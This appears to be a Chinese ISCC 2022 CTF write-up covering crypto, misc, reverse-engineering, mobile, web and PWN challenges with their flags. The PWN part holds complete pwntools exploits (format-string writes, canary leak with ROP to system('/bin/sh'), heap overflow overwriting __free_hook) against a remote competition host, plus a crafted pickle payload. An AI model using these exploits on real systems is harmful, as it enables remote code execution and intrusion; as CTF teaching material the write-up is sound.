24650194985355153552198357593808130629042232388997475934142482180581413670301249765850321594340946693817059933786961129401164409678075708675654670414449498423805470300868883980543108273057191, 38162810917870423497415976195550985283843950680529049352287989443837834607427430908386227981760607012468966076309297964621061969525433491089809297256537209996590034089705613494609971414942483, 16106661412350506424003000819671696402573350097591091267469051557299003724836803927381506823541750712076867906278238744458399104508171739612500841120601902731190037252983961964270369478250135, 60717008689247973968781938908566004496180475295144030364468903344435573439513131353777950673379589823683156482940320368719840535307811939182548209068851585456944960601918613118057278691443843, 57882240905969595582166302623532199536967394873129928940872411621111224766922438484933075842178960723921646374080389455787308593783246149991904442287560715779178925080106931972299586979959953, 12061826536513185869260563532670900297362162236282900029931589855777340428534398586928322428305858525536948501230868891250447684672637900859825530841033648726270215853767105468881462766353647, 40973633971153999167540984043398551153130298337916277287184472612550851536816203105848218587839346694510913994031730070798708511216239645963193961083872326468979562529128797727840639098996831, 25190964043610225574969743147281492438276087947398074376921729347532928885807409753830940977173209614701838033744898224166579262470797747208929440196369133055839958296041729070928084928175397, 23085492771770494644509788889915907342680818144147360119437564563164180950856851904291430723050735715720034055261306070039381175120138832656617084745093517302210431379995787153962673396950446, 1937286375866702470033764597194175817538611841028892680723733464978386442218526149097443771018354033246248121985191264427707436520669150306012229684753815587120632879284603625150768954590725, 57668655807108259615437079174326332892999147524507134641048100122456123589342568481735509156000192574732309053941159985990102188395289859827445761194795514225271513965790503406398879250946020, 35198545820474489569899848069249557859170666517373907458835345371345885779724027455048887305989157801081342610829321715939227090350286603804194859507448972973163229187760810563747030534930096, 2680837408459670214531068863211655690161634979199681308665046291376585209054365216866169377888301551485329985613646031207005581077478836769647505836036847408127664883863678654156379263672346, 12121350007979822308927681064432222683457135471774074095342842220722850481125191571362576595891866927101566205385910418597553030873994196798229835399838952671263905444731701933770406420792121, 4957631799318318039287713537332279724312547937403771431018555605386508208230343165704781613086526046297842296986943480338666436341519107096931707271246707069346795647588239516143515089036499, 35549534355465956154494768947760967550998727688555042974552178207809004983427424921103316720643881947201408505005591186968625102168923059623511112094217632912471836757511264755862703270341997, 52110172792858889942550084958723550101567576170513478250074784092459757017185078051587972765023896269497260859190340089967413958256099639411918402705603770318443799706825579668789545784614306, 21979260423626821018489541432634891685215725203513830851598610785031805881508993329398466374053154095270019921311344755282533940013298535097200167881351776957252298149312359379466488394766334, 18835091260797073562570197337192687096149062471010909287505026739256851663845652546228812299453403369197090762437909361190694731343103307114750836735997823980817474260923309093351161826331851, 31741489402516148911633197695597953081401237503796854927240741326207504993089377049583728444407858426004232071134468398273396605006577855552656764382734524654277518570822875478167442638070901, 16050117042291126277677926822141336442372387354061686268361792054293011835387201560959594636149809378193176734175577918539778477385651844891098832581022035133541637266082160308042031860506989, 16379463477204913330055508893873729174739376880548770933003570470660499885606594386561420463061184588808230491183336279782405733295425571066874025844316939637315915343557140783536280314260190, 23058007636349322493533060888214863711857942288940601048898840019057943804724486110106459414627162992559209093285612285210308835967706195433862579974709778186744020858324991526063814823612287, 19497548104095059626306207887464394273778151478519542948752215627780389285194991470064485692362185896936181237881579479933106410836542916696923953216719052408411804666552233932131319571241763, 17632121136316990934955612215609500766435472016530990904203129722465440826062961881413835332832993132979526774745855028877553216518081174139693119715949034199141619868897050824712146245401588, 1871468487319968372908785904638027514106261889215980360019125483842603309636049187223167809902816215052058167498138766999050264473961232336492552974671621923732211039196537569962142516042355, 62926073061408568815305709546008876991925602654691545685161680583826362674827494368322825291911250082105230802573121612633252347575715105923975409004163278303768506104733416649687428519800752, 65500365105957172579636962313973498672764577312979370212418478100944941884490065883379135454667686291049053276049947674376272785046831902692005131485978786748114625044420777348285369514422896, 39442084005803859743248651321324383868223256723271248941942941219329288135436852908442074189537390961087604110496233569348047766997496498099112587487212179108572289958814078996194165124356571, 28749645518483530181191626607360401710965005503452507585402702473101692981830330921977455897406578416614294892273156950031964192568883035130344623321903046909134347294496256397080491610449783, 59215486516688778254818458983882413560832323676510288447057843140104907059498699532075660384822833477717456618622107255774778427073278729948292838400614933795378669974510804626649421793785832, 38239266349865570890118308779334625251415166366089226198270068826789870291975773540805447014702851667297091330678993691371210077982768540678144457713502249064302773372842360541892860517005928, 10781869801098745922189009636686366741026376123099365671761874522828753309010095045974148776576101040476333187616026046251883938367061041869707334631470632264224458586898378761910988484407522, 44555661165298366621929077029890439918460348802513192503445343800607358749326722940430429144066972517739493904631128687734149376126254489721753894732678101106393312221317100067575618291906876, 66419168629567921834343053143841391733067579594096450584346524244338021419929728437472466918227931064432540911955687063794088879714385096689969461262536176954842293004546425098238106744967544, 53070736350010579101478261026664742633830440810518969293809356268130347073700238364938313884976128806691925379909738186549901426616348254114665071229526846834842533859242206037281011591036289, 22849589939655807391095873987864500357112477263503457235954254349498524812852403116832329056488396748162091885144551074568286219666156511990443897994844330670468980085373463662416383618461467, 7180153334322933025085037204940906254349411631575887280143813253513754261470238096914777722623869792438427552448168780705532068475077894323728119245309544237160824439200585721645590166228420, 11482439014492604534559359091537077661618461698201369584284070129079518511868618757186994516752885928499921289354962724980964253578120911579146839767416018399357811759286441128701879257327409, 13340284240190076852801996978492272593934260994217650388686339010003533927947169352715971012947009755179237313888884967110512743624920673608875707982244817410379882924572291491377414280764504, 16319742011618547561318291933298747389763403441769656204941637523542180357712784347887893270400819572630615616460967210482111595184242129252734239196181783997489879602947364401095934436633840, 25245264191238070106632203778761096089815457066460589468863204041741021444830520840049730272302444433418401417213547796426097383885110343132458212248252538060762962376716059459828802790134118, 4569462007281085626344114509743551095912755602276157412382743883572282836905576946714633114678917034713786819842866758824276969427145784594847589758199664134223615366421110564305852166850756, 16222138934890360286734397616869346119188006403962150947344247922973455683049770004862573585016786313381016665646116773581837505032908893603036889177730855936060000638140423475038765571082437, 27536486649538589838877405800312664596659200874025350885626913317294289481742460638948156829376486168554629725395805255505979788662356489076920425846567848580616902117147138363914943128262868, 19660548836315869980577632085657144304460234727275696562095405800452804952270456690413464091827809646872415608257296548283420857426618514532827157035478615928221980512251880148725239045050572, 2935575951698898266032232265490012685304313227978895061964424259438886204380199162255685722119174179934665079343266063365713050997303256282211640759431768058030092561437103884802603110488026, 15050391309067926582121418817448212157268553037114604384884318666136444999543717730382845372854181435979402248620494574452171618000054901482776133338676983233450693782357102727495150466680028, 15844239224848276396953918986430334242804023674203926124579340310286053504639009733470273287917036368416360132676495915311526874480593278206185756588598105157038681320484244707469227627438636, 60141538952334547131714083168714853189936401560162514615025382204736687748110514588745620090074870079766772161067031978039680771075103440185765155578539288563622621860106047359168162260844534, 45047381276471250981174619803556224475748621940824687575867936161420399614080749846164595911294933112671467207082180454047497664417895485437634278353614168990051094115123403717078196249807462, 63213628474195584088061650017856358607306056083424690128239046359606799520947289828953816760280214157198463731468395297879555219745776202587009614095816156557391728270483415956231481216684127, 47127670452411541823641342868939225861162646075398727586082968366329064652785940730549374132934052760090536352442764305603139737908099767454603464370232665245220297648297947630663865185956858, 27253024246190707296003159139128937539039294335558161543719274117695143050858801199381756277345531356352915974838147614765883773007952056088797078000243444232563774396178048368410683022243600, 58536339286803714222234300164727185302498750556527460206135534519254767876585761649566526890768447339045289107648373430624328699713491542596523037967861994155279091191591924807670592955011170, 57175551329982920356116680928451690094476558030201982262370861043678283259979647494102980609873273499338588744799175384224575598567727581411955085338869075971019893816832990408113023589210692, 1691228204126640565048609153105718816682391106279130954873266081535994803009983222071629038374948751966597853814710700984986351218672473434401054012842971444924818052453217913126056804136634, 18259029928340107051612327899051598631621572170439491860737800320015828939423260018800103341952219448169798069021795590884245237859665920663962296060767687499992086244092229454910838687365523, 34275887125068602666708845519395025657705837555812683307610201684446869655870749876133358373069234049138641432900703496298668500973107970893808842807146663365267834946542177020935189486846663, 59478292605909585646382908673223430222120032595326349358553695541323907659346576450864085948860581917387406847299785962961771900629629458942186507337471890453270925234354360840846884207643024, 18471913267399338563212326631641044656181709708944323035056233436403418430332177915960100112418275886822971100478565428197902731068875657494263701867756491180732018002382889213400874919101437, 28419356783698622386038466787527804412812948444393147867606362906428208603221951008262562715703516257770939548500131732375680515310439957569029091346899056154440147332745840385444672517664872, 4708757448340822715920459148813728646061290570953127713098444568688336699702657954376259939408787111187863066857145859213594085300401029256265676556400548573084764170467918774885607183523407, 63035795145332257671110618754242812319412358745570179949829104657791665675480259338228488240452172475363993781946567214140071689730597091676924635337666041026748259004653243201003399276554500, 13189986625164442133210084295476894490640116756733531036044924355555127993186837134306976392035419483325751906098295742029817206682768342920654845357323042907301486682385483087515626774642983, 56479004843147047171593377125630572933044188348660633825638380537481087842510559431561593902889277909735622988511294737943589757547993119607061747602839484836518764277869991350077042440305063])
nbit = len(pubKey)
encoded = (2639622584605651396581817251490032779454497426926835395155361491646809433696877389021382879271034071363673713244579933536498932208083160752102337857045696761077282255141184610061711587402657723)
A =              Matrix(ZZ, nbit + 1, nbit + 1)
for i in range(nbit):
    A[i, i] = 1
for i in range(nbit):
    A[i, nbit] = pubKey[i]
A[nbit, nbit] = -(encoded)

res = A.LLL()
for i in range(0, nbit + 1):
    M = res.row(i).list()
    flag = True
    for m in M:
        if m != 0 and m != 1:
            flag = False
            break
                                                             #print 1
    if flag:
        print (i, M)
                                         #print over
        M = ''.join(str(j) for j in M)
        M = M[:-1]
        M = hex(int(M, 2))[2:-1]
        print (M)

sageMath在线解密这个脚本运行得到十六进制,然后转字符串得到flag

img

ISCC{Rs3C-zKM5-pIee}

隐秘的信息

img

base64解密得到解压包密码easy_to_find_the_flag,解压之后得到一个图片,lsb通道,提取前两行

img

在线网站https://gchq.github.io/解密得到flagimg

RE

Amy’s Code

附件拉到ida里面,main反编译

image-20220501120411753

sub_4115FF,sub_411433为主要函数。跟进sub_411433

image-20220501120516031

image-20220501120524119

跟进sub_4115FF

image-20220501120814513image-20220501120838415

v6='LWHFUENGDJGEFHYDHIGJ'
v9=[149,169,137,134,212,188,177,184,177,197,192,179,153,129,196,124,142,174,106,184]
str=''
flag=''
for i in range(len(v6)):
    str+=chr(v9[i]-ord(v6[i]))
for i in range(len(v9)):
    flag+=chr(ord(str[i])^i)
print(flag)

image-20220501121303256

Sad Code

main函数反编译

img

from z3 import *
s = Solver()
v16=[Int('v16[%d]'%i) for i in range(7)]
v15=Int('v15')
s.add(v16[1] + 7 * v16[0] - 4 * v15 - 2 * v16[2] == 0x1E9CE8CDB)
s.add(5 * v16[2] + 3 * v16[1] - v16[0] - 2 * v15 == 0x13CFADB9E)
s.add(2 * v16[0] + 8 * v16[2] + 10 * v15 - 5 * v16[1] == 0x4CD876232)
s.add(7 * v15 + 15 * v16[0] - 3 * v16[2] - 2 * v16[1] == 0x7CC936A0B)
s.add(15 * v16[3] + 35 * v16[6] - v16[4] - v16[5] == 0x10D543E690)
s.add(38 * v16[5] + v16[3] + v16[6] - 24 * v16[4] == 0x664955F03)
s.add(38 * v16[4] + 32 * v16[3] - v16[5] - v16[6] == 0x13F5455D8A)
s.add(v16[3] + 41 * v16[5] - v16[4] - 25 * v16[6] == 0x41D596666)
if s.check():
    print(s.model())

img

from Crypto.Util.number import long_to_bytes
v16=[0]*7
v16[2] = 1261262927
v16[4] = 1112026458
v15 = 1230193475
v16[6] = 1515477117
v16[3] = 1447647832
v16[1] = 1180258382
v16[5] = 1346916437
v16[0] = 2068662353
flag=long_to_bytes(v15)
for i in v16:
    flag+=long_to_bytes(i)
print(flag)

img

得到ISCC{MHQFYPNK-XOVIZXBH-ZPHPUZTX}

GetTheTable

下载附件,反编译之后base58解码得到答案

img

img

Bob’s Code

首先将附件反编译,审计

img

审计之后发现需要将.W1BqthGbfihKthkzV1tYc.hl5oY5qcbJ3XhXQXXlRoWBWdhRTXORpf1RwoF0.偏移2,使用以下脚本

#include<string.h>
#include<stdio.h>
int main(){
                    char s[] = ".W1BqthGbfihKthkzV1tYc.hl5oY5qcbJ3XhXQXXlRoWBWdhRTXORpf1RwoF0.";
                    int w = 2;
                     for (int  i = 0;i<strlen(s); ++i )
                      {
                        if ( s[i] < 65 || s[i] > 90 )
                        {
                          if ( s[i] >= 97 && s[i] <= 122 )
                            s[i] = (s[i] - w - 97 + 26) % 26 + 97;
                        }
                        else
                          s[i] = (s[i] - w - 65 + 26) % 26 + 65;
                        printf("%c",s[i]);
                      }
                    return 0;
}

偏移得到.U1ZorfEzdgfIrfixT1rWa.fj5mW5oazH3VfVOVVjPmUZUbfPRVMPnd1PumD0.然后通过base64码表ABCDEfghijklmnopqrsTUVWXYZabcdeFGHIJKLMNOPQRStuvwxyz0123456789-_解码得到base64加密的内容SVNDQ3tabDR1OTVhRy1nNk8wTUhURi1FTlZkVjMwZn0=,然后解码得到flag

img

ISCC{Zl4u95aG-g6O0MHTF-ENVdV30f}

VigenereLike

附件分析

img

s = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def My_base64_decode(inputs):
    bin_str = []
    for i in inputs:
        if i != '=':
            x = str(bin(s.index(i))).replace('0b', '')
            bin_str.append('{:0>6}'.format(x))
    outputs = ""
    nums = inputs.count('=')
    while bin_str:
        temp_list = bin_str[:4]
        temp_str = "".join(temp_list)
        if (len(temp_str) % 8 != 0):
            temp_str = temp_str[0:-1 * nums * 2]
        for i in range(0, int(len(temp_str) / 8)):
            outputs += chr(int(temp_str[i * 8:(i + 1) * 8], 2))
        bin_str = bin_str[4:]
        print("input1")
    return outputs
a = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
b = "rJFsLqVyFKYTn2Wgeuo8u Ltm8T0o2wCK9mmCrv="
key = "ISCCYES"
v17 = [1,2,3,4,5,6,7]
flag = ""
flag1 = ""
for i in range(len(b)-1):
    flag += a[(a.find(b[i]) - a.find(key[i%7]) + 63) % 63]
    print("input2")
flag =flag+ "="
flag = My_base64_decode(flag)
for i in range(len(flag)):
    flag1 += chr(ord(flag[i]) ^ v17[i%7])
    #print("result")
print("ISCC{"+flag1[:-4]+"}")

ISCC{Reverse-8QN61wE6-2SLeGLYX}

Ruststr

附件反编译寻找main,分析之后,qmemcpy函数的写个脚本跑一下

img

b = [0x9A, 0x78, 0xB6, 0x12, 0xBE, 0x66, 0x8D, 0xCF, 0x51, 0x9E,
     0x63, 0xCB, 0x4A, 0xD1, 0x1A, 0x59, 0x78, 0x1C, 0x17, 0x73,
     0xF2, 0x1D, 0x05, 0x2F, 0xF0, 0xD7, 0xB3, 0x22, 0x5D, 0xAD,
     0x0B, 0xE2]

table="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
decode="5EvneNRco/dq9yu7ZJdOCj5LUQePeWBbmw=="       

x="".join(map(lambda x:bin(table.index(x))[2:].zfill(6),decode))
c=[]
for i in range((len(x))//8):
    c.append(int('0b'+x[i*8:(i+1)*8],2))
    print(hex(c[i]),end=" ")
    #print("!"),debug test运行
m = []
for i in range(len(c)):
    m.append(c[i]^b[i])
    print("1")
key = [0x32, 0x63, 0x65, 0x61, 0x39, 0x66, 0x30, 0x34, 0x63, 0x36, 0x33,
       0x62, 0x34, 0x32, 0x38, 0x33, 0x39, 0x34, 0x30, 0x65, 0x63, 0x30,
       0x65, 0x36, 0x64, 0x32, 0x39, 0x62, 0x65, 0x32, 0x38, 0x64]
def lll(a,b):
    if a>b:
        return 0
    else:
        return -1
f = ''
for i in range(len(m)):
    for j in range(128):
        if (lll((key[i]+0xd0)&0xff,0xa) + j +2)&0xff == m[i]:
            f += chr(j)
            print(f)
            break
p = list(f[::-1])

print()
def ppp(num):
    a = num&1
    return a==0
for i in range(len(p)):
    if ord('a')<=ord(p[i])<=ord('z'):
        p[i] = chr(ord(p[i])^0x20)
    elif ord('A')<=ord(p[i])<=ord('Z'):
        p[i] = chr(ord(p[i])^0x20)
    elif ord('0') <=ord(p[i])<=ord('9'):
        a = ord(p[i]) + 1
        b = ord(p[i]) - 1
        if ppp(ord(p[i])):
            p[i] = chr(a)
        else:
            p[i] = chr(b)
    else:
        pass
for i in range(len(p)):
    print(p[i],end='')

img

ISCC{Reverse-NgH86-9IHo0}

PWN

create_id

格式化字符串漏洞

img

脚本如下

from pwn import *

r = remote('123.57.69.203',5310)
HI = int(r.recvuntil("\n")[:-1],16)

r.sendline('6')
r.sendline('7')
r.sendline('8')

r.sendlineafter("\n",b"%9c%12$n"+p32(HI))
result = r.recvuntil("}")

print(result)

img

ISCC{0d11-0757-4e20-805a-e0a3}

sim_treasure

分析sp1附件,循环类型格式化字符串

img

脚本如下:

from pwn import *
context(arch='i386')

r = remote('123.57.69.203',7010)

elf = ELF(binary)

libc = elf.libc

offset = 6

r.recvuntil("Can you find the magic word?\n")
r.sendline('%35$p')
libc_base = int(r.recvuntil(b'\n')[:-1],16)-libc.symbols['__libc_start_main']-241
system = libc_base+libc.symbols['system']
sh = libc_base+0x17E3CF
success(hex(libc_base))

r.sendline('%2$p')
eip_addr = int(r.recvuntil(b'\n')[:-1],16)+4
r.sendline('%3$p')
code_addr = int(r.recvuntil(b'\n')[:-1],16)-0x16CA
success(hex(code_addr))

payload = fmtstr_payload(offset,{code_addr+0x2A60:system})

r.sendline(payload)
r.send(b'/bin/sh\x00')

sleep(0.3)
r.sendline('cat flag')

r.interactive()

ISCC{1127-c2c2-4f8a-a0a7-e630}

跳一跳

img

__readfsqword函数,直觉告诉我应该是泄露Canary,脚本如下

from pwn import *
from LibcSearcher import LibcSearcher

context(os="linux", arch="amd64", log_level="debug")


l32 = lambda                                                                          :u32(sh.recvuntil("\x7f")[-4:].ljust(4,"\x00"))
l64 = lambda                                                                          :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))

leak= lambda name,data                               :sh.success(name + ": 0x%x" % data)

sa  = lambda a,b     
s                  = lambda payload                        :sh.send( payload)
:sh.sendafter(str(a),str(b))
sl  = lambda payload                                    :sh.sendline(payload )
sla = lambda a,b                                                :sh.sendlineafter(str (a),str(b))

r   = lambda numb=4096                   :sh.recv(numb)
ru  = lambda a                                                                     :sh.recvuntil(str(a))
rl                 = lambda                                                                                 :sh.recvline()
uu32= lambda data                                         :u32(data.ljust(4, b'\x00'))
uu64= lambda data                                         :u64(data.ljust(8, b'\x00'))
                    print("success")

def b(addr):
                    bk="b *$rebase("+str(addr)+")" #pie
                    attach(sh,bk+"\nc")
                    success("attach")

filename = "pwn"
elf = ELF("./pwn")
def pwn(ip,port,debug,remote_libc , local_libc):
                    global sh
                    # global libc     
                    if(debug == 1):
                                         sh = process("./{}".format(filename))
                                         # sh = process("", env={"LD_PRELOAD": libc_path})
                                         #  p=process(["ld.so","./goal"],env={"LD_PRELOAD":"libc.so"}, stdout=stdout, stdin= stdin)
                                         libc = local_libc
                    else:
                                         sh = remote(ip,port)
                                         libc = remote_libc
                    # sh.timeout =   0.1
                    #b(0x1217) #printf



                    ru("of pwn~")

                    for i in range(0xd8+1):
                                         #sleep(0.01)
                                         sl(b"210")
                    s(b'a')

                    
                    print("success")

                    ru("input: ")
                    data = r()
                    print("data==>",data)


                    canary_int = u64(data[-13:-6].rjust(8,b"\x00"))#data[-8:]
                    print("__canary==>",hex(canary_int),type(canary_int))  

                    instant_rsp = u64(data[-6:].ljust(8,b"\x00"))
                    print("instant_rsp==>",hex(instant_rsp))


                    read = 0x121c
                    # print( rbp - 0xe0)                                                                                                                                                                                                                                
                    s((0xe0-0x8 )*b"a"  + p64(canary_int) +  p64(instant_rsp + 0xe0) +p8(0x01))
                    ru("input: ")
                    data = r()
                    A_elfaddr = u64(data[-6:].ljust(8,b"\x00"))#;print("A_elfaddr==>",hex(A_elfaddr))
                    pie = A_elfaddr - 0x12b0
                    elf_bss = elf.bss() + pie;data = elf_bss + 0x330

                    read = pie + read
                    buf = b"a"*(0xe0-8);canary = canary_int;rbp = data;rip = read
                    print("data = rbp1/rsp1=>",hex(rbp),"rip1=>",hex(rip))
                    s(buf + p64(canary) + p64(rbp) + p64(rip) )

                    ret = 0x1016 + pie
                    pop_rdi_ret = 0x130b + pie
                    leave_ret = 0x124A + pie
                    puts_got = elf.got["puts"] + pie;puts_plt = elf.plt["puts"] + pie
                    read_got = elf.got["read"] + pie;read_plt = elf.plt["read"] + pie
                    printf_got = elf.got["printf"] + pie;setbuf_got = elf.got['setbuf']


                    next_read_ptr = data + 0x200 ;print("rbp3=next_read_ptr",hex(next_read_ptr))
                    print("rsp=>",hex(data+0x8))
                    rop = p64(next_read_ptr)

                    rop +=p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)
                    rop += p64(pop_rdi_ret)+p64(read_got)+p64(puts_plt)
                    rop += p64(pop_rdi_ret)+p64(printf_got)+p64(puts_plt)
                    
                    rop += p64(ret)+ p64(read)+p64(leave_ret)
                    rop += p64(canary)*int(27 - 13)
                                         
                    buf = rop;canary = canary_int;rbp = data-0xe0;rip = leave_ret

                    print("next_read_ptr = rbp2",hex(rbp),"rip2=>",hex(rip))
                    s(buf + p64(canary) + p64(rbp) + p64(rip))

                    raw_input()

                    puts_addr = u64(r(7)[-7:-1].ljust(8,b"\x00")) ;leak("puts_addr",puts_addr)
                    read_addr = u64(r(7)[-7:-1].ljust(8,b"\x00")) ;leak("read_addr",read_addr)
                    printf_addr = u64(r(7)[-7:-1].ljust(8,b"\x00"));leak("printf_addr",printf_addr)

                    
                    
                    """
                    puts_addr = u64(r(6).ljust(8,b"\x00")) ;leak("puts_addr",puts_addr);
                    data2 = r(0xf)
                    read_addr = u64(data2[-14:-8].ljust(8,b"\x00")) ;leak("read_addr",read_addr);rl()
                    printf_addr = u64(data2[-7:-1].ljust(8,b"\x00"));leak("printf_addr",printf_addr);rl()
                    #setbuf_addr = u64(r(7)[-7:-1].ljust(8,b"\x00"));leak("setbuf_addr",setbuf_addr)
                    """

                    #puts_addr = u64(data[])
                    libc = LibcSearcher('puts', puts_addr)
                    libc.add_condition("read", read_addr)
                    libc.add_condition("printf", printf_addr)
                    libc_base = puts_addr - libc.dump('puts')


                    print("######################## third ########################")
                    system_addr = libc_base + libc.dump('system')
                    bin_sh_addr = libc_base + libc.dump('str_bin_sh')
                    leak("system_addr",system_addr);leak("bin_sh_addr",bin_sh_addr)

                    rop = p64(next_read_ptr-0xe0)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(system_addr)
                    rop += p64(canary)*int(27 - 5)
                    #rop.ljust(0xe0-8,b"a")
                    buf = rop;canary = canary_int;rbp = next_read_ptr-0xe0;rip = leave_ret
                    s(buf + p64(canary) + p64(rbp) + p64(rip))


                    sh.interactive()


if __name__ == "__main__":
                    pwn("123.57.69.203",7020,0, remote_libc = 0 , local_libc=ELF("/lib/x86_64-linux-gnu/libc.so.6"))

跑脚本后得到flag

untidy_note

堆溢出漏洞,脚本如下:

from pwn import *
context(arch='amd64')

binary = './untidy_note'
r = remote('123.57.69.203',7030)
elf = ELF(binary)

libc = ELF('libc-2.27.so')

def Allocate(size=0x18):
    r.sendlineafter("CHOOSE\:\n",'1')
    r.sendlineafter("note size is:\n",str(size))
    print("1")

def Free(index):
    r.sendlineafter("CHOOSE:\n",'2')
    r.sendlineafter("index:\n\n",str(index))
    print("2")

def Edit(index,payload):
    r.sendlineafter("CHOOSE:\n",'3')
    r.sendlineafter("index:\n",str(index))
    r.sendlineafter("size is:\n",str(len(payload)))
    r.sendafter("Content:\n",payload)
    print("3")
def Show(index):
    r.sendlineafter("CHOOSE:\n",'4')
    r.sendlineafter("index:\n",str(index))
    print("4")
r.sendlineafter("NAMEIS:",'HN-影影卷起来了')
for i in range(26):
    Allocate(0x1f)
Allocate(0x8)#26
for i in range(26):
    Free(i)
Edit(26,b'a'*0x18+p32(0x11))
Allocate()
Allocate()
Show(1)
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-998-10-libc.symbols['__malloc_hook']
free_hook = libc_base+libc.symbols['__free_hook']
system = libc_base+libc.symbols['system']
success("system -> "+hex(system))
success("libc_base -> "+hex(libc_base))

Allocate(0x1f)
Allocate(0x1f)
Allocate(0x1f)
Allocate(0x1f)
Allocate(0x1f)
Allocate(0x1f)
Allocate(0x1f)

Free(4)
Free(5)
Free(6)
Edit(6,p64(free_hook))
Allocate(0x1f)
Allocate(0x1f)
Edit(8,p64(system))
# print("success")
Allocate(0x18)
Edit(9,b'/bin/sh\x00')
Free(9)

r.interactive()

img

ISCC{af72-d61a-45d7-8845-0404}

mobile

MobileA

APK反编译

img

flag被分成了两段,先把R0ZacFlGeUNsT3Z5LzJuc0ltRHJhRTQrQS9TUDBxcjVxblMrL01iUHoxST0=base解密之后aes解密得到flag前半段,在这里发现偏移量和密钥

byte[] arrayOfByte3 = (new String(Base64.encode("K@e2022%%y".getBytes(StandardCharsets.UTF_8), 0))).replace("\n", "").getBytes(StandardCharsets.UTF_8);
  byte[] arrayOfByte2 = (new String(Base64.encode("I&V2022***".getBytes(StandardCharsets.UTF_8), 0))).replace("\n", "").getBytes(StandardCharsets.UTF_8);

密钥和偏移量进行base64编码后进行aes解密

img

然后

img

这个是cmd5解密得到flag后半段,组合得到ISCC{mb…o_jghgfTSAD_no}

MobileB

首先先将apk文件进行反编译得到伪代码得到重要信息

**private** **boolean** Jformat(String paramString) {
   **return** (paramString.length() < 10) ? **false** : ((paramString.substring(0, 5).equals("ISCC{") && paramString.charAt(paramString.length() - 1) == '}' && a.a(stringFromJNI(paramString.substring(5, paramString.length() - 1))).equals("52405240520120520134034020134030120130")));
  }

用apktool反编译得到so文件

分析得知,之间存在联系,exp如下

a=input("RESUULT:")[:-1]
b=input("ONE")
b+=b
c=input("TWO")
c+=c
d=input("THREE")
d+=d
e=input("FOUR")
e+=e
f=input("FIVE")
f+=f
g=input("SIX")
g+=g
h=input("SEVEN")
h+=h
i=input("EIGHT")
i+=i
j=input("NINE")
j+=j
k=input("TEN")
k+=k
l=input("ELENVE")
l+=l
m=input("TWLVE")
m+=m
n=[5,1,51,2,52,12,512,3,53,13,513,23,523,123,5123,4,54,14,514,24,524,124,5124,34,534,134,5134,234,5234,1234,51234]
# PRINT("1")
a=list(map(int,a.split("0")))
o="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
p=[]
for r in a:
                                         p.append(o[n.index(r)])
q=[d,m,g,i,h,c,e,l,b,f,j,k]
print("ISCC{",end='')
# print("1")
for r in range(12):
                                         print(q[r][q[r].index(p[r],26)-9],end='')
print('}')

擂台赛wp

MISC

666

img

是伪加密,把09改为00即可成功解压。

img

img

这个时候发现flag.rar这个压缩包也需要密码,所以拿这个图片下手,steghide扫描一下,发现一个密码为123456的high.png,查看分离的图片修改高度得到一堆字符,是压缩包密码!@#$%678()_+,然后得到pcap文件进行流量分析,追踪tcp得到一个网址,https://www.cnblogs.com/konglingdi/p/14998301.html

img

访问之后发现是个动图img

分析得到base64编码img

SElERWtleTo4NTIgOTg3NDU2MzIxIDk4NDIzIDk4NDIzIFJFQUxrZXk6eFN4eA==

解码得到HIDEkey:852 987456321 98423 98423 REALkey:xSxx

通过九宫格推出reakey为ISCC

还有一个是

img

pQLKpP/EPmw301eZRzuYvQ==,aes解码,密码是ISCC,得到flag ISCC{lbwmeiyoukaig}

img

扫!

附件一堆图片–二维码掩码,转八进制之后得到新的压缩包,再次解压,。里面是flag.txt,打开得到flagimg

flag{S0_Many_qR}

真扫yoo

得到大量条形码,拿出来一个stegsolve看看信息

img

有提示,

53 56 4E 44 51 33 74 6A 4D 47 52 6C 4D 7A 6B 6D 59 7A 42 6B 5A 54 45 79 4F 47 46 33 59 58 30 3D

直接将每个图片的hexo合起来然后hex转字符串,再base64解码得到flag

img

img

ISCC{c0de39&c0de128awa}

WEB

Melody(赛后做出来,既然写了就不删了)

扫目录得到info,查看得到提示

?Melody={{config}}查询密钥

img

key:meldoy-is-so-cute-wawawa!

然后传入session发现代码

# -*- coding:utf-8 -*-
import pickle
import melody
import base64
from flask import Flask, Response,request

class register:
  def __init__(self,name,password):
      self.name = name
      self.password = password

  def __eq__(self, other):
      return type(other) is register and self.name == other.name and self.password == other.password


class RestrictedUnpickler(pickle.Unpickler):
  def find_class(self, module, name):
      if module[0:8] == '__main__':
          return getattr(sys.modules['__main__'],name)
      raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def find(s):
  return RestrictedUnpickler(io.BytesIO(s)).load()

@app.route('/therealflag', methods=['GET','POST'])
def realflag():
  if request.method == 'POST':
      try:
          data = request.form.get('melody')
          if b'R' in base64.b64decode(data):
              return 'no reduce'
          else:
              result = find(base64.b64decode(data))
              if type(result) is not register:
                  return 'The type is not correct!'
          correct = ((result == register(melody.name,melody.password))&(result == register("melody","hug")))
          if correct:
              if session['username'] == 'admin':
                  return Response(read('./flag.txt'))
              else:
                  return Response("You're not admin!")
      except Exception as e:
          return Response(str(e))

  test = register('admin', '123456')
  data = base64.b64encode(pickle.dumps(test)).decode()
  return Response(data)

picke反序列化覆盖melody的模板变量,exp如下

import base64

data=b'''c__main__
melody
(S'name'
S"melody"
S"hug"
S"1"
db0(c__main__
register
S"melody"
S"hug"
o.
'''
print(base64.b64encode(data))
b'Y19fbWFpbl9fCm1lbG9keQooUyduYW1lJwpTIm1lbG9keSIKUyJodWciClMiMSIKZGIwKGNfX21haW5fXwpyZWdpc3RlcgpTIm1lbG9keSIKUyJodWciCm8uCg=='

img

然后传入得到flag

ISCC{2022_melody_secrets}

Ping2rce

GoAhead环境变量注入。CVE-2021-42342 GoAhead 远程命令执行漏洞

这里先尝试本地得到回显

img

劫持ping执行过程中环境变量注入

img

得到flag ISCC{c1522169-7dcvd499-4add960-9ad36-8b2a5f2f7}

RE

easyre

去花指令后得到main函数

img

这三个函数分别异或 ,最后和比较^<L^<LX:LX.MJ.MJ9PJ9VF$VF$T@$T]`

key='enc!@#key'
